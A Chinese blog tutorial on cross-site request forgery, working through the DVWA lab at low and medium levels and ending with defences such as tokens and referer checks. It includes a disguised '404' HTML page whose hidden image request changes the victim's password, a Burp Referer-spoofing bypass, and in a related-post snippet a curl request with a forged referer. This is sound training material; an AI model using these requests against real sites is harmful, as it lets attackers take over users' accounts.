csrf讲解+DVWA-csrf练习

最新推荐文章于 2024-03-04 08:15:00 发布
最新推荐文章于 2024-03-04 08:15:00 发布
阅读量854 收藏 1
点赞数 1
文章标签: csrf web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63087425/article/details/125153744
版权
本文详细介绍了CSRF(跨站请求伪造)攻击的原理,包括攻击者如何控制用户浏览器发送恶意请求,并展示了在不同安全等级下DVWA平台的CSRF漏洞利用方法。针对防御CSRF,提出了验证码、检查referer和使用token等策略。同时,强调了在高安全等级下,使用token验证的重要性。
摘要由CSDN通过智能技术生成

CSRF漏洞

1.原理

csrf(cross-site request forgery):跨站请求伪造

CSRF攻击利用网站对于用户浏览器的信任,攻击者挟持用户的登录信息,向网站发送一些并非用户本意的请求,执行一些操作。

img

在CSRF攻击中,攻击者通过控制用户浏览器发送恶意的额外请求,破坏会话完整性

为何攻击者可以控制用户浏览器?

根据浏览器的安全策略,允许当前页面发送到任何地址的请求,所以,当用户在受信任的网站中点击了攻击者的恶意链接后,就进入了攻击者构造的页面,这个页面是不受用户控制的,于是攻击者就可以通过控制自己构造的页面来控制用户的浏览器发送请求了。

产生CSRF攻击的要求:

1.用户登录了网站,能够进行网站上的正常操作

2.用户点击了攻击者的URL链接

2.csrf利用

环境:phpstudy+DVWA

1.low等级

将DVWA security修改为low

low等级核心代码

<?php
//核心代码
if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];    
    $pass_conf = $_GET[ 'password_conf' ];   //核心代码
      if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

可以看到,low等级只要password_new和password_conf一致即可

例如,我们想要将密码改为777

1.方法1:直接可以在url中修改,因为此时的修改密码没有进行任何防护

2.方法2:或者写一个HTML文件 ,命名为localhost.html(这个文件要放在www文件夹下1)

<!DOCTYPE HTML>
<html>
    <head></head>
    <title></title>
    <body>
        <img src="http://localhost/DVWA-master/vulnerabilities/csrf/?password_new=777&password_conf=777&Change=Change#"/>
    <h1> 404</h1>
    <h2>not found</h2>
    </body>
</html>

我们在浏览器中打开这个localhost.html文件

好了,这时候我们也完成了密码修改

2.medium等级

我们首先将dvwa security的等级修改为medium

核心代码:

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
      //上一行为增加的代码
      // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
            $pass_new = md5( $pass_new );

可以看到,medium等级相比low等级多了一个 stripos( S E R V E R [ ′ H T T P R E F E R E R ′ ] , _SERVER[ 'HTTP_REFERER' ] , SERVER[HTTPREFERER],_SERVER[ ‘SERVER_NAME’ ]) !== false的条件

它的意思是需要验证referer中是否包含server_name参数(http请求中的host和要访问的主机名),过滤规则中表明referer中必须包含主机名这里是localhost,所以我们就使用localhost.html就可以绕过了

我们打开burpsuite,将proxy模块打开

我们继续返回到浏览器,输入newpassword=777, confirm new password=777,点击change按钮

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KVp5Osp5-1654518743200)(C:\Users\zhs\AppData\Roaming\Typora\typora-user-images\image-20220606184545305.png)]

好了,这时候我们抓到了包

然后,我们把它发送到repeater模块

我们修改repeater中的referer,原始referer为Referer: http://localhost/DVWA-master/vulnerabilities/csrf/

修改为

http://localhost/localhost.html

将它发送出去(点击send按钮)

看到reponse回应一个200 OK即修改成功了

3.high等级
if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
//上一行为新增核心代码
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

可以看出,high等级多了一行代码checkToken( $_REQUEST[ ‘user_token’ ], $_SESSION[ ‘session_token’ ], ‘index.php’ );,

如果攻击者想要修改用户的密码,就必须获得token值(当用户访问修改密码页面,服务器会返回一个token值,然后用户向浏览器发送修改密码请求时,必须带上token值,只有token值正确,服务器才会进行接下来的操作)

由于浏览器跨域请求是不被允许的,所以这里我们不进行high等级练习

4.impossible等级

这个等级必须要知道初始密码,攻击者如果不知道,是没办法进行攻击的

3.csrf防御

1.验证码

2.referer

referer被包含在http请求中:referer的含义是表明一个请求的来源

在一些网站上的用户进行敏感操作时,我们可以设置referer,如果它不来源于同一url来源,我们直接拒绝掉这个请求

3.添加token值并验证

csrf攻击成功的实质就是:攻击者可以猜中用户的所有重要参数,而token解决了这一问题

token值是服务器为每一个用户产生的独特的值,它不放在cookie中,所以不会被攻击者利用

当用户要发送请求时,必须带上token值

而攻击者的请求中不含有token值,这种请求就会被服务器拒绝掉

救命救敏
关注
DVWA-CSRF
STTTM的博客
12-18 1043
LOW等级: 首先进行正常操作。 接下来打开burpsuit抓包 如图所示,将password参数test改为password: 退出DVWA用刚刚修改的密码成功登陆: 由此可知,这个数据包发送给其他用户,只要该用户登陆了DVWA的网站,就能修改他们的密码,攻击者只要修改password_new和password_conf这两个参数为自己想要的密码,将新的get请求的...
DVWACSRF
RexHa的博客
09-30 7721
CSRF,跨站域请求伪造,通常攻击者会伪造一个场景(例如一条链接),来诱使用户点击,用户一旦点击,黑客的攻击目的也就达到了,他可以盗用你的身份,以你的名义发送恶意请求。
dvwa csrf
gwl7878的博客
06-27 646
中级 curl -e "http://172.19.180.27/dvwa/vulnerabilities/csrf"  --Cookie "security=medium; PHPSESSID=8sfh17npgpajd0ikuh3"  --location "http://172.19.180.27/dvwa/vulnerabilities/csrf/?password_new=pass
dvwaCSRF
Alsn86的博客
02-05 377
dvwaCSRF 是一个修改密码的功能 把密码修改为111111的请求数据包是这样的,请求链接为http://192.168.1.110/dvwa-master/vulnerabilities/csrf/?password_new=111111&password_conf=111111&Change=Change CSRF之low等级 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_G
DVWA-master.zip
01-04
除了上述常见漏洞外,DVWA还包括如“弱口令”、“CSRF(跨站请求伪造)”、“不安全的直接对象引用”等其他安全挑战,这些都为学习者提供了全面的安全训练。 7. **实践与挑战** 通过DVWA,你可以模拟黑客的攻击...
DVWA-master安装包
02-28
3. **跨站请求伪造(CSRF)**:攻击者诱导用户执行非预期的操作,比如更改密码或转账,因为请求看起来像是来自用户自己。 4. **文件包含漏洞**:当程序允许用户指定要加载的文件时,不正确的验证可能导致恶意文件被...
DVWA-master.7z 压缩包
09-14
DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,设计用于帮助安全专业人员测试他们的安全技能和工具,同时也为开发人员提供一个平台来了解常见Web应用漏洞的本质。这个"DVWA-master.7z"压缩包...
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
### DVWA-安装-漏洞测试-漏洞修复指南 #### 安装与配置 根据文档描述,为了使用DVWA(Damn Vulnerable Web Application)进行漏洞测试,首先需要安装XAMPP或WampServer作为Web服务器环境。以下是安装步骤的概述: ...
pikachu + dvwa
09-22
Pikachu是一款针对初学者的安全训练平台,它模拟了一系列真实的网络攻防场景,涵盖了SQL注入、XSS攻击、CSRF(跨站请求伪造)等多种常见漏洞。通过实践操作,用户可以学习如何发现并修复这些安全问题,提升自身的...
DVWACSRF
weixin_42075643的博客
02-20 714
CSRF:跨站点请求伪造(Cross—Site Request Forgery) 也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种冒充合法用户在当前登录或登录过的且登录信息尚未过期的Web浏览器或者应用程序上执行恶意的操作的攻击方法。跟跨站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。 漏洞原理: 合法路人甲登录网站A,登录成功后,服务器返回一个存有用户登录信息的coo.
DVWACSRF攻击
weixin_47726676的博客
05-16 2105
d
CSRF+DVWA
weixin_44843084的博客
05-15 202
CSRF漏洞原理学习 跨站请求伪造是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。 跨站请求攻击,是攻击者通过欺骗用户的浏览器去访问一个用户曾经认证过的网站并运行一些操作。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去运行。这利用了web中用户身份验证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。 要完成一次CSRF攻击,用户必须依次完成 1.登录受信任网站A,并在本地生成Cookie。 2.在不登出A的情况下,访问
Dvwa系列之csrf
lowerxiaoshen的博客
12-09 1422
CSRF(Cross-site request forgery)CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的
DVWA——CSRF
weixin_51559599的博客
11-13 1404
这样解决了上种方法在请求中加入 token 的不便,同时,通过 XMLHttpRequest 请求的地址不会被记录到浏览器的地址栏,也不用担心 token 会透过 Referer 泄露到其他网站中去。可以在 HTTP 请求中以参数的形式加入一个随机产生的 token,并在服务器端建立一个拦截器来验证这个 token,如果请求中没有 token 或者 token 内容不正确,则认为可能是 CSRF 攻击而拒绝该请求。可以利用这一点漏洞,可以想办法在恶意网站的地址中添加带有 Web1 主机地址的字段。
CSRF(三)dvwa靶场实验
最新发布
03-04 419
CSRF(三)dvwa靶场实验
DVWA--CSRF详解
洋洋的小黑屋
01-04 2217
CSRF概念: CSRF跨站请求伪造,黑客诱导用户点击带有伪造请求(修改密码,转账,删除文章等高风险操作请求)链接后,利用未失效的用户认证信息,产生服务器验证请求通过,导致用户在不知名的情况下进行了转账等操作。 与XSS的区别: XSS是通过修改页面Javascript等代码后,发给用户从而实现盗取cookie信息,之后利用cookie进行登陆网站等操作。非法操作是黑客。 CSRF并没有盗取coo...
DVWA-mater是什么
07-13
DVWA-master是一个开源的漏洞测试应用程序,全称为"Damn Vulnerable Web Application",即"可见Web应用程序"。它旨在提供一个安全测试环境,帮助用户学习和理解常见的Web应用程序漏洞以及安全防护方法。通过DVWA-master,用户可以模拟和测试各种Web应用程序漏洞,包括SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等等。这样用户可以通过实践来提高对Web应用程序安全的理解和技能。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值